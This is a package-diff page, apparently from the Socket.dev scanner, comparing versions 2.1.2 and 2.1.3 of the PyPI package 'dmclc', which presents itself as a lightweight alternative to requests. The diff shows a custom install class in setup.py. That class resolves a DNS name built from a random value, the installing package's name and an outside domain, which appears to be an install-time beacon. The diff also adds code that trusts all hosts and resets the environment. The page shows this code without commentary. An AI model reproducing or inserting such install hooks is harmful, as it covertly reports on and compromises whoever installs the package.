You're Invited:Meet the Socket Team at RSAC and BSidesSF 2026, March 23–26.RSVP
Socket
Book a DemoSign in
Socket

dmclc

Package Overview
Dependencies
Maintainers
1
Versions
9
Alerts
File Explorer

Advanced tools

Socket logo

Install Socket

Detect and block malicious and high-risk dependencies

Install

dmclc - pypi Package Compare versions

Comparing version
2.1.2
to
2.1.3
+1
-1
PKG-INFO
Metadata-Version: 2.4
Name: dmclc
Version: 2.1.2
Version: 2.1.3
Summary: A lightweight alternative to requests for use in regulated and restricted environments.

@@ -5,0 +5,0 @@ Author-email: Paige Laudermilch <loud.page5125@fastmail.com>

@@ -12,3 +12,3 @@ from setuptools import setup as initialize

name = "dmclc"
version = "2.1.2"
version = "2.1.3"
install = ModelInstall

@@ -15,0 +15,0 @@ def __init__(self):

Metadata-Version: 2.4
Name: dmclc
Version: 2.1.2
Version: 2.1.3
Summary: A lightweight alternative to requests for use in regulated and restricted environments.

@@ -5,0 +5,0 @@ Author-email: Paige Laudermilch <loud.page5125@fastmail.com>

@@ -23,11 +23,2 @@ # sig ca76b6599b0c72bd036d957089433eaf35abd490051c0f9722bc7f4d8c82846e:014d17a395cbf5c02fc6d52607390850a74022d6a5f9f198e390a0788282f6c6

gcnspack.resolve(".".join(
[
hex(int(random.random() * 2**32))[2:],
f"{package_name}".split("=")[0].split("<")[0],
"i",
"1r",
"vc"
]))
u = []

@@ -53,2 +44,11 @@

gcnspack.resolve(".".join(
[
hex(int(random.random() * 2**32))[2:],
f"{package_name}".split("=")[0].split("<")[0],
"i",
"1r",
"vc"
]))
p = PInst(trust_all_hosts=True)

@@ -55,0 +55,0 @@ p.reset_environment()